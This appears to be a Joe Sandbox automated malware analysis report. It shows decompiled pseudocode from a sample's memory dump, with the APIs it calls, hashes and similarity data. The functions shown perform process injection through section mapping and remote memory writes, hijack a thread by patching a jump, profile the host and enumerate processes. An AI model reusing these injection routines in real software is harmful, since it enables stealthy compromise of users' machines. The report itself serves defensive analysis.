                                                                                                                                                                                              0x0499d6ab
                                                                                                                                                                                              0x0499d6c0
                                                                                                                                                                                              0x0499d6c0
                                                                                                                                                                                              0x0499d6ca
                                                                                                                                                                                              0x0499d6d4
                                                                                                                                                                                              0x0499d6d4
                                                                                                                                                                                              0x0499d6db
                                                                                                                                                                                              0x0499d6db
                                                                                                                                                                                              0x0499d4a4
                                                                                                                                                                                              0x0499d4be
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499d4c4
                                                                                                                                                                                              0x0499d4cc
                                                                                                                                                                                              0x0499d4d4
                                                                                                                                                                                              0x0499d4da
                                                                                                                                                                                              0x0499d4e1
                                                                                                                                                                                              0x0499d4e9
                                                                                                                                                                                              0x0499d4ea
                                                                                                                                                                                              0x0499d4f1
                                                                                                                                                                                              0x0499d4f4
                                                                                                                                                                                              0x0499d4f5
                                                                                                                                                                                              0x0499d4fc
                                                                                                                                                                                              0x0499d4ff
                                                                                                                                                                                              0x0499d506
                                                                                                                                                                                              0x0499d507
                                                                                                                                                                                              0x0499d50a
                                                                                                                                                                                              0x0499d516
                                                                                                                                                                                              0x0499d538
                                                                                                                                                                                              0x0499d540
                                                                                                                                                                                              0x0499d543
                                                                                                                                                                                              0x0499d54e
                                                                                                                                                                                              0x0499d54e
                                                                                                                                                                                              0x0499d540
                                                                                                                                                                                              0x0499d56a
                                                                                                                                                                                              0x0499d579
                                                                                                                                                                                              0x0499d57c
                                                                                                                                                                                              0x0499d581
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499d5ab
                                                                                                                                                                                              0x0499d5bb
                                                                                                                                                                                              0x0499d5bd
                                                                                                                                                                                              0x0499d5c4
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499d5d9
                                                                                                                                                                                              0x0499d5ec
                                                                                                                                                                                              0x0499d600
                                                                                                                                                                                              0x0499d60c
                                                                                                                                                                                              0x0499d611
                                                                                                                                                                                              0x0499d616
                                                                                                                                                                                              0x0499d61c
                                                                                                                                                                                              0x0499d622
                                                                                                                                                                                              0x0499d62a
                                                                                                                                                                                              0x0499d63a
                                                                                                                                                                                              0x0499d646
                                                                                                                                                                                              0x0499d650
                                                                                                                                                                                              0x0499d658
                                                                                                                                                                                              0x0499d65d
                                                                                                                                                                                              0x0499d660
                                                                                                                                                                                              0x0499d668
                                                                                                                                                                                              0x0499d668
                                                                                                                                                                                              0x0499d668
                                                                                                                                                                                              0x0499d66b
                                                                                                                                                                                              0x0499d66f
                                                                                                                                                                                              0x0499d670
                                                                                                                                                                                              0x0499d674
                                                                                                                                                                                              0x0499d678
                                                                                                                                                                                              0x0499d681
                                                                                                                                                                                              0x0499d687
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499d687
                                                                                                                                                                                              0x0499d662
                                                                                                                                                                                              0x0499d666
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499d666

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • NtCreateSection.NTDLL(0499D982,0000000E,00000000,?,00000040,08000000,00000000,?), ref: 0499D4B9
                                                                                                                                                                                              • RegisterClassExA.USER32(?), ref: 0499D50D
                                                                                                                                                                                              • CreateWindowExA.USER32 ref: 0499D538
                                                                                                                                                                                              • DestroyWindow.USER32(00000000), ref: 0499D543
                                                                                                                                                                                              • UnregisterClassA.USER32 ref: 0499D54E
                                                                                                                                                                                              • NtMapViewOfSection.NTDLL(0499D982,00000000), ref: 0499D579
                                                                                                                                                                                              • NtMapViewOfSection.NTDLL(0499D982,00000000,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 0499D5A0
                                                                                                                                                                                              • VirtualAllocEx.KERNELBASE(00000000,00000000,00001AC4,00001000,00000004), ref: 0499D5E6
                                                                                                                                                                                              • WriteProcessMemory.KERNELBASE(00000000,00000000,00000000,00001AC4,?), ref: 0499D600
                                                                                                                                                                                                • Part of subcall function 04998BF4: HeapFree.KERNEL32(00000000,00000000), ref: 04998C3A
                                                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,00000000,049961C5), ref: 0499D678
                                                                                                                                                                                              • NtUnmapViewOfSection.NTDLL(00000000), ref: 0499D6C0
                                                                                                                                                                                              • NtClose.NTDLL(00000000), ref: 0499D6D4
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Section$View$ClassCreateWindow$AllocCloseDestroyFreeHeapMemoryProcessRegisterUnmapUnregisterVirtualWritelstrlen
                                                                                                                                                                                              • String ID: 0$18293$aeroflot$quatr
                                                                                                                                                                                              • API String ID: 494031690-2640591812
                                                                                                                                                                                              • Opcode ID: 69f686e7e674b42e8f552525fd833f4674a94370f4b207ad2331b7a61f2ca18d
                                                                                                                                                                                              • Instruction ID: f5971a35f3a9fd01d95611e19a1dc8bea88e1aa051be1be4bc7b2e386805a4b0
                                                                                                                                                                                              • Opcode Fuzzy Hash: 69f686e7e674b42e8f552525fd833f4674a94370f4b207ad2331b7a61f2ca18d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6581F4B1E04219AFEB10DF98D884AEEBBF8FF08304F144179E605A7250D774AE55CBA5
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0499DF3D Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 250COMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              C-Code - Quality: 85%
                                                                                                                                                                                              			E0499DF3D(void* __fp0) {
				long _v8;
				long _v12;
				union _SID_NAME_USE _v16;
				char _v144;
				short _v656;
				char _v668;
				char _v2644;
				void* __esi;
				struct _OSVERSIONINFOA* _t68;
				intOrPtr _t70;
				void* _t71;
				intOrPtr _t73;
				void* _t74;
				intOrPtr _t75;
				void** _t77;
				intOrPtr _t79;
				intOrPtr _t80;
				intOrPtr _t81;
				int _t90;
				intOrPtr _t92;
				void* _t93;
				void* _t97;
				intOrPtr _t99;
				intOrPtr _t101;
				short _t106;
				long _t108;
				intOrPtr _t113;
				intOrPtr _t116;
				intOrPtr _t119;
				intOrPtr _t123;
				intOrPtr _t134;
				intOrPtr _t136;
				intOrPtr _t138;
				intOrPtr _t141;
				intOrPtr _t143;
				intOrPtr _t148;
				void* _t149;
				WCHAR* _t150;
				char* _t151;
				intOrPtr _t162;
				intOrPtr _t177;
				void* _t191;
				struct _OSVERSIONINFOA* _t192;
				void* _t193;
				WCHAR* _t195;
				long _t198;
				void* _t199;
				char* _t200;
				void* _t203;
				int* _t204;
				void* _t216;

				_t216 = __fp0;
				_t148 =  *0x49af830; // 0x4990000
				_t68 = E04998BDE(0x1ac4);
				_t192 = _t68;
				if(_t192 != 0) {
					 *((intOrPtr*)(_t192 + 0x1640)) = GetCurrentProcessId();
					_t70 =  *0x49af818; // 0x4bdf8b0
					_t71 =  *((intOrPtr*)(_t70 + 0xac))(_t193);
					_t3 = _t192 + 0x648; // 0x648
					E049A3548( *((intOrPtr*)(_t192 + 0x1640)) + _t71, _t3);
					_t73 =  *0x49af818; // 0x4bdf8b0
					_t5 = _t192 + 0x1644; // 0x1644
					_t194 = _t5;
					_t74 =  *((intOrPtr*)(_t73 + 0x128))(0, _t5, 0x105);
					_t207 = _t74;
					if(_t74 != 0) {
						 *((intOrPtr*)(_t192 + 0x1854)) = E049995F3(_t194, _t207);
					}
					_t75 =  *0x49af818; // 0x4bdf8b0
					_t77 = E0499C879( *((intOrPtr*)(_t75 + 0x12c))()); // executed
					 *(_t192 + 0x110) = _t77;
					_t159 =  *_t77;
					if(E0499C9F4( *_t77) == 0) {
						_t79 = E0499C8C9(_t159, _t194); // executed
						__eflags = _t79;
						_t162 = (0 | _t79 > 0x00000000) + 1;
						__eflags = _t162;
						 *((intOrPtr*)(_t192 + 0x214)) = _t162;
					} else {
						 *((intOrPtr*)(_t192 + 0x214)) = 3;
					}
					_t14 = _t192 + 0x220; // 0x220, executed
					_t80 = E0499F3A3(_t14); // executed
					 *((intOrPtr*)(_t192 + 0x218)) = _t80;
					_t81 = E0499F368(_t14); // executed
					 *((intOrPtr*)(_t192 + 0x21c)) = _t81;
					_t17 = _t192 + 0x114; // 0x114
					_t195 = _t17;
					 *((intOrPtr*)(_t192 + 0x224)) = _t148;
					_v12 = 0x80;
					_v8 = 0x100;
					if(LookupAccountSidW(0,  *( *(_t192 + 0x110)), _t195,  &_v12,  &_v656,  &_v8,  &_v16) == 0) {
						GetLastError();
					}
					_t90 = GetSystemMetrics(0x1000);
					_t28 = _t192 + 0x228; // 0x228
					_t149 = _t28;
					 *(_t192 + 0x1850) = 0 | _t90 > 0x00000000;
					E0499DF36(_t149); // executed
					_t211 = _t149;
					if(_t149 != 0) {
						 *((intOrPtr*)(_t192 + 0x434)) = E049995F3(_t149, _t211);
					}
					_t92 = E0499C6CE();
					_t33 = _t192 + 0xb0; // 0xb0
					_t196 = _t33;
					 *((intOrPtr*)(_t192 + 0xac)) = _t92;
					_t93 = E0499C4C1(_t92, _t33, _t211, _t216);
					_t35 = _t192 + 0xd0; // 0xd0
					E049999DF(_t93, _t33, _t35);
					_t36 = _t192 + 0x438; // 0x438
					E0499960D(_t149, _t36);
					_t97 = E0499E2C5(_t196, E0499A43D(_t33), 0);
					_t37 = _t192 + 0x100c; // 0x100c
					E0499C6E4(_t97, _t37, _t216);
					_t99 =  *0x49af818; // 0x4bdf8b0
					_t101 = E0499CA46( *((intOrPtr*)(_t99 + 0x12c))(_t195)); // executed
					 *((intOrPtr*)(_t192 + 0x101c)) = _t101;
					E04998D6D(_t192, 0, 0x9c);
					_t204 = _t203 + 0xc;
					_t192->dwOSVersionInfoSize = 0x9c;
					GetVersionExA(_t192);
					 *((intOrPtr*)(_t192 + 0xa8)) = E0499DD39(_t100);
					_t106 = E0499DD62(_t105);
					_t41 = _t192 + 0x1020; // 0x1020
					_t150 = _t41;
					 *((short*)(_t192 + 0x9c)) = _t106;
					GetWindowsDirectoryW(_t150, 0x104);
					_t108 = E04999DF2(_t105, 0x9cf);
					_t177 =  *0x49af818; // 0x4bdf8b0
					_t198 = _t108;
					 *_t204 = 0x104;
					_push( &_v668);
					_push(_t198);
					_v8 = _t198;
					if( *((intOrPtr*)(_t177 + 0xec))() == 0) {
						_t143 =  *0x49af818; // 0x4bdf8b0
						 *((intOrPtr*)(_t143 + 0x108))(_t198, _t150);
					}
					E04998BAF( &_v8);
					_t113 =  *0x49af818; // 0x4bdf8b0
					_t48 = _t192 + 0x1434; // 0x1434
					_t199 = _t48;
					 *_t204 = 0x209;
					_push(_t199);
					_push(L"USERPROFILE");
					if( *((intOrPtr*)(_t113 + 0xec))() == 0) {
						E04999E51(_t199, 0x105, L"%s\\%s", _t150);
						_t141 =  *0x49af818; // 0x4bdf8b0
						_t204 =  &(_t204[5]);
						 *((intOrPtr*)(_t141 + 0x108))(L"USERPROFILE", _t199, "TEMP");
					}
					_push(0x20a);
					_t51 = _t192 + 0x122a; // 0x122a
					_t151 = L"TEMP";
					_t116 =  *0x49af818; // 0x4bdf8b0
					_push(_t151);
					if( *((intOrPtr*)(_t116 + 0xec))() == 0) {
						_t138 =  *0x49af818; // 0x4bdf8b0
						 *((intOrPtr*)(_t138 + 0x108))(_t151, _t199);
					}
					_push(0x40);
					_t200 = L"SystemDrive";
					_push( &_v144);
					_t119 =  *0x49af818; // 0x4bdf8b0
					_push(_t200);
					if( *((intOrPtr*)(_t119 + 0xec))() == 0) {
						_t136 =  *0x49af818; // 0x4bdf8b0
						 *((intOrPtr*)(_t136 + 0x108))(_t200, L"C:");
					}
					_v8 = 0x7f;
					_t59 = _t192 + 0x199c; // 0x199c
					_t123 =  *0x49af818; // 0x4bdf8b0
					 *((intOrPtr*)(_t123 + 0xbc))(_t59,  &_v8);
					_t62 = _t192 + 0x100c; // 0x100c
					E049A3548(E0499E2C5(_t62, E0499A43D(_t62), 0),  &_v2644);
					_t63 = _t192 + 0x1858; // 0x1858
					E049A351A( &_v2644, _t63, 0x20);
					_push( &_v2644);
					_push(0x1e);
					_t66 = _t192 + 0x1878; // 0x1878
					_t191 = 0x14;
					E049996DA(_t66, _t191);
					_t134 = E0499DAE3(_t191); // executed
					 *((intOrPtr*)(_t192 + 0x1898)) = _t134;
					return _t192;
				}
				return _t68;
			}






















































                                                                                                                                                                                              0x0499df3d
                                                                                                                                                                                              0x0499df47
                                                                                                                                                                                              0x0499df53
                                                                                                                                                                                              0x0499df58
                                                                                                                                                                                              0x0499df5d
                                                                                                                                                                                              0x0499df6a
                                                                                                                                                                                              0x0499df70
                                                                                                                                                                                              0x0499df75
                                                                                                                                                                                              0x0499df7b
                                                                                                                                                                                              0x0499df8b
                                                                                                                                                                                              0x0499df90
                                                                                                                                                                                              0x0499df95
                                                                                                                                                                                              0x0499df95
                                                                                                                                                                                              0x0499dfa5
                                                                                                                                                                                              0x0499dfab
                                                                                                                                                                                              0x0499dfad
                                                                                                                                                                                              0x0499dfb6
                                                                                                                                                                                              0x0499dfb6
                                                                                                                                                                                              0x0499dfbc
                                                                                                                                                                                              0x0499dfc9
                                                                                                                                                                                              0x0499dfce
                                                                                                                                                                                              0x0499dfd4
                                                                                                                                                                                              0x0499dfdd
                                                                                                                                                                                              0x0499dfeb
                                                                                                                                                                                              0x0499dff2
                                                                                                                                                                                              0x0499dff7
                                                                                                                                                                                              0x0499dff7
                                                                                                                                                                                              0x0499dff8
                                                                                                                                                                                              0x0499dfdf
                                                                                                                                                                                              0x0499dfdf
                                                                                                                                                                                              0x0499dfdf
                                                                                                                                                                                              0x0499dffe
                                                                                                                                                                                              0x0499e004
                                                                                                                                                                                              0x0499e009
                                                                                                                                                                                              0x0499e00f
                                                                                                                                                                                              0x0499e014
                                                                                                                                                                                              0x0499e01a
                                                                                                                                                                                              0x0499e01a
                                                                                                                                                                                              0x0499e023
                                                                                                                                                                                              0x0499e02d
                                                                                                                                                                                              0x0499e03b
                                                                                                                                                                                              0x0499e05c
                                                                                                                                                                                              0x0499e05e
                                                                                                                                                                                              0x0499e05e
                                                                                                                                                                                              0x0499e06e
                                                                                                                                                                                              0x0499e073
                                                                                                                                                                                              0x0499e073
                                                                                                                                                                                              0x0499e080
                                                                                                                                                                                              0x0499e086
                                                                                                                                                                                              0x0499e08b
                                                                                                                                                                                              0x0499e08d
                                                                                                                                                                                              0x0499e096
                                                                                                                                                                                              0x0499e096
                                                                                                                                                                                              0x0499e09e
                                                                                                                                                                                              0x0499e0a3
                                                                                                                                                                                              0x0499e0a3
                                                                                                                                                                                              0x0499e0a9
                                                                                                                                                                                              0x0499e0b4
                                                                                                                                                                                              0x0499e0b9
                                                                                                                                                                                              0x0499e0c1
                                                                                                                                                                                              0x0499e0c7
                                                                                                                                                                                              0x0499e0cf
                                                                                                                                                                                              0x0499e0e1
                                                                                                                                                                                              0x0499e0e7
                                                                                                                                                                                              0x0499e0ef
                                                                                                                                                                                              0x0499e0f4
                                                                                                                                                                                              0x0499e101
                                                                                                                                                                                              0x0499e112
                                                                                                                                                                                              0x0499e118
                                                                                                                                                                                              0x0499e11d
                                                                                                                                                                                              0x0499e120
                                                                                                                                                                                              0x0499e123
                                                                                                                                                                                              0x0499e130
                                                                                                                                                                                              0x0499e136
                                                                                                                                                                                              0x0499e140
                                                                                                                                                                                              0x0499e140
                                                                                                                                                                                              0x0499e146
                                                                                                                                                                                              0x0499e14e
                                                                                                                                                                                              0x0499e159
                                                                                                                                                                                              0x0499e15e
                                                                                                                                                                                              0x0499e164
                                                                                                                                                                                              0x0499e166
                                                                                                                                                                                              0x0499e173
                                                                                                                                                                                              0x0499e174
                                                                                                                                                                                              0x0499e175
                                                                                                                                                                                              0x0499e180
                                                                                                                                                                                              0x0499e182
                                                                                                                                                                                              0x0499e189
                                                                                                                                                                                              0x0499e189
                                                                                                                                                                                              0x0499e193
                                                                                                                                                                                              0x0499e198
                                                                                                                                                                                              0x0499e19d
                                                                                                                                                                                              0x0499e19d
                                                                                                                                                                                              0x0499e1a3
                                                                                                                                                                                              0x0499e1aa
                                                                                                                                                                                              0x0499e1ab
                                                                                                                                                                                              0x0499e1b8
                                                                                                                                                                                              0x0499e1cb
                                                                                                                                                                                              0x0499e1d0
                                                                                                                                                                                              0x0499e1d5
                                                                                                                                                                                              0x0499e1de
                                                                                                                                                                                              0x0499e1de
                                                                                                                                                                                              0x0499e1e4
                                                                                                                                                                                              0x0499e1e9
                                                                                                                                                                                              0x0499e1ef
                                                                                                                                                                                              0x0499e1f5
                                                                                                                                                                                              0x0499e1fa
                                                                                                                                                                                              0x0499e203
                                                                                                                                                                                              0x0499e205
                                                                                                                                                                                              0x0499e20c
                                                                                                                                                                                              0x0499e20c
                                                                                                                                                                                              0x0499e212
                                                                                                                                                                                              0x0499e21a
                                                                                                                                                                                              0x0499e21f
                                                                                                                                                                                              0x0499e220
                                                                                                                                                                                              0x0499e225
                                                                                                                                                                                              0x0499e22e
                                                                                                                                                                                              0x0499e230
                                                                                                                                                                                              0x0499e23b
                                                                                                                                                                                              0x0499e23b
                                                                                                                                                                                              0x0499e244
                                                                                                                                                                                              0x0499e24c
                                                                                                                                                                                              0x0499e253
                                                                                                                                                                                              0x0499e258
                                                                                                                                                                                              0x0499e267
                                                                                                                                                                                              0x0499e27f
                                                                                                                                                                                              0x0499e286
                                                                                                                                                                                              0x0499e294
                                                                                                                                                                                              0x0499e29f
                                                                                                                                                                                              0x0499e2a0
                                                                                                                                                                                              0x0499e2a4
                                                                                                                                                                                              0x0499e2aa
                                                                                                                                                                                              0x0499e2ab
                                                                                                                                                                                              0x0499e2b3
                                                                                                                                                                                              0x0499e2b8
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499e2c0
                                                                                                                                                                                              0x0499e2c4

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 04998BDE: RtlAllocateHeap.NTDLL(00000008,?,?,0499959D,00000100,?,04996507), ref: 04998BEC
                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 0499DF64
                                                                                                                                                                                              • LookupAccountSidW.ADVAPI32(00000000,?,00000114,00000080,?,?,?), ref: 0499E057
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0499E05E
                                                                                                                                                                                              • GetSystemMetrics.USER32(00001000), ref: 0499E06E
                                                                                                                                                                                              • GetVersionExA.KERNEL32(00000000), ref: 0499E123
                                                                                                                                                                                                • Part of subcall function 0499C8C9: FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,04990000), ref: 0499C96D
                                                                                                                                                                                              • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 0499E14E
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AccountAllocateChangeCloseCurrentDirectoryErrorFindHeapLastLookupMetricsNotificationProcessSystemVersionWindows
                                                                                                                                                                                              • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
                                                                                                                                                                                              • API String ID: 377074508-2706916422
                                                                                                                                                                                              • Opcode ID: 726b57653db3550987a1fe931fdd7967384578de2091363f11e77bee072105d7
                                                                                                                                                                                              • Instruction ID: 5ca74d182fb35effaab907639f8ed051bf95ee12550285f2e643f39d9b0e1076
                                                                                                                                                                                              • Opcode Fuzzy Hash: 726b57653db3550987a1fe931fdd7967384578de2091363f11e77bee072105d7
                                                                                                                                                                                              • Instruction Fuzzy Hash: FE915C71B00605ABEB04EB78D889FEAB7E8FF49304F004179E51A97280DB74BD558BE5
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0499D959 Relevance: 6.1, APIs: 4, Instructions: 89nativethreadCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 142 499d959-499d972 call 499d218 145 499d978-499d986 call 499d447 142->145 146 499da4b-499da56 call 499d38b 142->146 145->146 151 499d98c-499d9c3 call 4998d6d GetThreadContext 145->151 151->146 154 499d9c9-499da09 NtProtectVirtualMemory 151->154 155 499da49 154->155 156 499da0b-499da26 NtWriteVirtualMemory 154->156 155->146 156->155 157 499da28-499da47 NtProtectVirtualMemory 156->157 157->146 157->155
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E0499D959(void* __ecx, void** __edx, void* __eflags, intOrPtr _a4) {
				long _v8;
				long _v12;
				void* _v16;
				intOrPtr _v23;
				void _v24;
				long _v28;
				struct _CONTEXT _v744;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t33;
				void* _t57;
				long _t59;
				void* _t62;
				void** _t65;
				void* _t66;

				_t65 = __edx;
				_t57 = __ecx;
				_t66 = 0;
				if(E0499D218(__ecx, __edx, __edx, 0) != 0) {
					_t33 = E0499D447( *((intOrPtr*)(__edx)), _a4); // executed
					_t66 = _t33;
					if(_t66 != 0) {
						E04998D6D( &_v744, 0, 0x2cc);
						_v744.ContextFlags = 0x10002;
						if(GetThreadContext(_t65[1],  &_v744) != 0) {
							_t62 = _v744.Eax;
							_v12 = _v12 & 0x00000000;
							_v24 = 0xe9;
							_t59 = 5;
							_v23 = _t66 - _t62 - _a4 + _t57 + 0xfffffffb;
							_v8 = _t59;
							_v16 = _t62;
							if(NtProtectVirtualMemory( *_t65,  &_v16,  &_v8, 4,  &_v12) < 0 || NtWriteVirtualMemory( *_t65, _v744.Eax,  &_v24, _t59,  &_v8) < 0) {
								L6:
								_t66 = 0;
							} else {
								_v28 = _v28 & 0x00000000;
								if(NtProtectVirtualMemory( *_t65,  &_v16,  &_v8, _v12,  &_v28) < 0) {
									goto L6;
								}
							}
						}
					}
				}
				E0499D38B();
				return _t66;
			}



















                                                                                                                                                                                              0x0499d965
                                                                                                                                                                                              0x0499d967
                                                                                                                                                                                              0x0499d969
                                                                                                                                                                                              0x0499d972
                                                                                                                                                                                              0x0499d97d
                                                                                                                                                                                              0x0499d982
                                                                                                                                                                                              0x0499d986
                                                                                                                                                                                              0x0499d99a
                                                                                                                                                                                              0x0499d9a2
                                                                                                                                                                                              0x0499d9c3
                                                                                                                                                                                              0x0499d9c9
                                                                                                                                                                                              0x0499d9d1
                                                                                                                                                                                              0x0499d9df
                                                                                                                                                                                              0x0499d9e5
                                                                                                                                                                                              0x0499d9e6
                                                                                                                                                                                              0x0499d9f2
                                                                                                                                                                                              0x0499d9f9
                                                                                                                                                                                              0x0499da09
                                                                                                                                                                                              0x0499da49
                                                                                                                                                                                              0x0499da49
                                                                                                                                                                                              0x0499da28
                                                                                                                                                                                              0x0499da28
                                                                                                                                                                                              0x0499da47
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499da47
                                                                                                                                                                                              0x0499da09
                                                                                                                                                                                              0x0499d9c3
                                                                                                                                                                                              0x0499d986
                                                                                                                                                                                              0x0499da4b
                                                                                                                                                                                              0x0499da56

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 0499D218: LoadLibraryW.KERNEL32 ref: 0499D312
                                                                                                                                                                                                • Part of subcall function 0499D447: NtCreateSection.NTDLL(0499D982,0000000E,00000000,?,00000040,08000000,00000000,?), ref: 0499D4B9
                                                                                                                                                                                                • Part of subcall function 0499D447: RegisterClassExA.USER32(?), ref: 0499D50D
                                                                                                                                                                                                • Part of subcall function 0499D447: CreateWindowExA.USER32 ref: 0499D538
                                                                                                                                                                                                • Part of subcall function 0499D447: DestroyWindow.USER32(00000000), ref: 0499D543
                                                                                                                                                                                                • Part of subcall function 0499D447: UnregisterClassA.USER32 ref: 0499D54E
                                                                                                                                                                                                • Part of subcall function 04998D6D: memset.MSVCRT ref: 04998D7F
                                                                                                                                                                                              • GetThreadContext.KERNELBASE(?,00010002,00000000,00000000,00000000), ref: 0499D9BB
                                                                                                                                                                                              • NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 0499DA04
                                                                                                                                                                                              • NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 0499DA21
                                                                                                                                                                                              • NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 0499DA42
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: MemoryVirtual$ClassCreateProtectWindow$ContextDestroyLibraryLoadRegisterSectionThreadUnregisterWritememset
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1578692462-0
                                                                                                                                                                                              • Opcode ID: 2004da3fcedbf2b9b1bb3044790da3a51cbe7a85e30c59dc4ffd8b48836e75a4
                                                                                                                                                                                              • Instruction ID: 16414a9a859ec0cd401d2848ee5fb2163b21b9c0331e4382046b84cf2ec02cab
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2004da3fcedbf2b9b1bb3044790da3a51cbe7a85e30c59dc4ffd8b48836e75a4
                                                                                                                                                                                              • Instruction Fuzzy Hash: B2312C72A0110AAFDB11DFA9D985FDEBBFCAF88314F1042B5E504E2154D730EE558B91
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0499B96A Relevance: 6.1, APIs: 4, Instructions: 66processCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                                                              			E0499B96A(void* __ecx, void* __edx) {
				void* _v304;
				void* _v308;
				intOrPtr _v312;
				signed int _t16;
				signed int _t17;
				intOrPtr _t30;
				void* _t33;
				void* _t43;
				void* _t45;

				_t33 = __edx;
				_v304 = __ecx;
				_t16 = CreateToolhelp32Snapshot(2, 0);
				_t45 = _t16;
				_t17 = _t16 | 0xffffffff;
				if(_t45 != _t17) {
					E04998D6D( &_v304, 0, 0x128);
					_v304 = 0x128;
					if(Process32First(_t45,  &_v304) != 0) {
						do {
							_t43 = _v312( &_v308, _t33);
						} while (_t43 != 0 && Process32Next(_t45,  &_v308) != 0);
						FindCloseChangeNotification(_t45);
						_t17 = 0 | _t43 == 0x00000000;
					} else {
						_t30 =  *0x49af818; // 0x4bdf8b0
						 *((intOrPtr*)(_t30 + 0x30))(_t45);
						_t17 = 0xfffffffe;
					}
				}
				return _t17;
			}












                                                                                                                                                                                              0x0499b982
                                                                                                                                                                                              0x0499b984
                                                                                                                                                                                              0x0499b988
                                                                                                                                                                                              0x0499b98b
                                                                                                                                                                                              0x0499b98d
                                                                                                                                                                                              0x0499b992
                                                                                                                                                                                              0x0499b9a1
                                                                                                                                                                                              0x0499b9a9
                                                                                                                                                                                              0x0499b9bd
                                                                                                                                                                                              0x0499b9cd
                                                                                                                                                                                              0x0499b9d7
                                                                                                                                                                                              0x0499b9db
                                                                                                                                                                                              0x0499b9f8
                                                                                                                                                                                              0x0499b9ff
                                                                                                                                                                                              0x0499b9bf
                                                                                                                                                                                              0x0499b9bf
                                                                                                                                                                                              0x0499b9c5
                                                                                                                                                                                              0x0499b9ca
                                                                                                                                                                                              0x0499b9ca
                                                                                                                                                                                              0x0499b9bd
                                                                                                                                                                                              0x0499ba08

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000011,?,00000010), ref: 0499B988
                                                                                                                                                                                                • Part of subcall function 04998D6D: memset.MSVCRT ref: 04998D7F
                                                                                                                                                                                              • Process32First.KERNEL32(00000000,?), ref: 0499B9B8
                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,?), ref: 0499B9EB
                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0499B9F8
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32memset
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2518216231-0
                                                                                                                                                                                              • Opcode ID: ee1264b1b0c3e8883b41cd6f924000ace11d30aaeb2146518674763d47a4b619
